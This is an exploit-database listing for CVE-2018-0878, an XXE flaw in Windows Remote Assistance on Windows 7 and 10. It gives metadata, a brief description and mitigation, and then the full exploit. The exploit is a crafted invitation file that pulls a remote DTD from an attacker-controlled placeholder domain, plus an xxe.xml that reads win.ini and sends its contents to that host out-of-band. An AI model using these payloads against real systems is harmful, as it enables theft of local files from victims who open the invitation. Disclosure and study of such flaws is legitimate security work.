Microsoft Windows Remote Assistance XXE

vendor:

Windows

by:

Nabeel Ahmed

3.1

CVSS

LOW

XXE

611

CWE

Product Name: Windows

Affected Version From: Windows 7 (x64)

Affected Version To: Windows 10 (x64)

Patch Exists: YES

Related CWE: CVE-2018-0878

CPE: o:microsoft:windows

Metasploit: https://www.rapid7.com/db/vulnerabilities/msft-cve-2018-0878/

Other Scripts: N/A

Platforms Tested: Windows 7 (x64), Windows 10 (x64)

2018

Microsoft Windows Remote Assistance XXE

Invitation.msrcincident file contains an XML document with a DOCTYPE declaration that references an external entity. This external entity is used to include the contents of a file from the local system. The xxe.xml file contains an entity that is used to include the contents of the win.ini file from the local system.

Mitigation:

Disable external entity references in XML documents, and disable DTDs in XML documents.

Source

Exploit-DB raw data:

# Exploit Title: Microsoft Windows Remote Assistance XXE
# Date: 27/03/2018
# Exploit Author: Nabeel Ahmed
# Tested on: Windows 7 (x64), Windows 10 (x64)
# CVE : CVE-2018-0878
# Category: Remote Exploits

Invitation.msrcincident
------------------------
<?xml version="1.0" encoding="UTF-8" ?>  
<!DOCTYPE zsl [  
<!ENTITY % remote SYSTEM "http://<yourdomain.com>/xxe.xml">  
%remote;%root;%oob;]>

xxe.xml
------------------------
<!ENTITY % payload SYSTEM "file:///C:/windows/win.ini">  
<!ENTITY % root "<!ENTITY &#37; oob SYSTEM 'http://<yourdomain.com>/?%payload;'> ">

Reference: https://krbtgt.pw/windows-remote-assistance-xxe-vulnerability/
Reference: Vulnerability discovered by Nabeel Ahmed (@NabeelAhmedBE) of Dimension Data (https://www.dimensiondata.com)